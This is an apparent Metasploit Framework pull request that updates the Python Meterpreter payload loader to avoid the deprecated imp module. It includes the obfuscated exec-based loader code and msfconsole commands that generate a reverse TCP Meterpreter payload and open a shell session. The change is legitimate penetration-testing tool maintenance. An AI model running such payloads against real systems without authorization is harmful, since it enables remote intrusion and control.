### PR TITLE
Update meterpreter encryptor loader to support python 3.4

### DIFF
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -157,9 +157,15 @@ module Payload::Python::MeterpreterLoader
     aes_encryptor = Rex::Text.encode_base64(Rex::Text.zlib_deflate(python_aes_source))
     rsa_encryptor = Rex::Text.encode_base64(Rex::Text.zlib_deflate(python_rsa_source))
     %Q?
-import codecs,imp,base64,zlib
-met_aes = imp.new_module('met_aes')
-met_rsa = imp.new_module('met_rsa')
+import codecs,base64,zlib
+try:
+  import importlib.util
+  new_module = lambda x: importlib.util.spec_from_loader(x, loader=None)
+except ImportError:
+  import imp
+  new_module = imp.new_module
+met_aes = new_module('met_aes')
+met_rsa = new_module('met_rsa')
 exec(compile(zlib.decompress(base64.b64decode(codecs.getencoder('utf-8')('#{aes_encryptor}')[0])),'met_aes','exec'), met_aes.__dict__)
 exec(compile(zlib.decompress(base64.b64decode(codecs.getencoder('utf-8')('#{rsa_encryptor}')[0])),'met_rsa','exec'), met_rsa.__dict__)
 sys.modules['met_aes'] = met_aes

--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 116841
+  CachedSize = 117045
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 116833
+  CachedSize = 117037
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 116833
+  CachedSize = 117037
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 116741
+  CachedSize = 116945
 
   include Msf::Payload::Single
   include Msf::Payload::Python


### PR DESCRIPTION
Removes console warnings when running Meterpreter with Python versions 3.4 or greater

Closes https://github.com/rapid7/metasploit-framework/issues/16532

### Before

Warnings when running python 3.4 and above

```
 $ docker run -it --rm -v $(pwd):/$(pwd) -w $(pwd) python:3.9-slim /bin/bash --login -c "python shell.py"
<string>:1713: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
```

### After

Silence:

```
 $ docker run -it --rm -v $(pwd):/$(pwd) -w $(pwd) python:3.9-slim /bin/bash --login -c "python shell.py"
```

## Verification

Generate a payload:

```
use python/meterpreter_reverse_tcp
generate -o shell.py -f raw lhost=192.168.123.1 MeterpreterDebugBuild=false MeterpreterTryToFork=false
to_handler
```

I tested on various versions to ensure a shell is opened:

```
docker run -it --rm -v $(pwd):/$(pwd) -w $(pwd) python:2.7-slim /bin/bash --login -c "python shell.py"
docker run -it --rm -v $(pwd):/$(pwd) -w $(pwd) python:3.4-slim /bin/bash --login -c "python shell.py"
docker run -it --rm -v $(pwd):/$(pwd) -w $(pwd) python:3.5-slim /bin/bash --login -c "python shell.py"
docker run -it --rm -v $(pwd):/$(pwd) -w $(pwd) python:3.9-slim /bin/bash --login -c "python shell.py"
```

Ensure that the deprecation warning is no longer present and that the meterpreter session is valid:

```
sessions -i -1 -C dir
```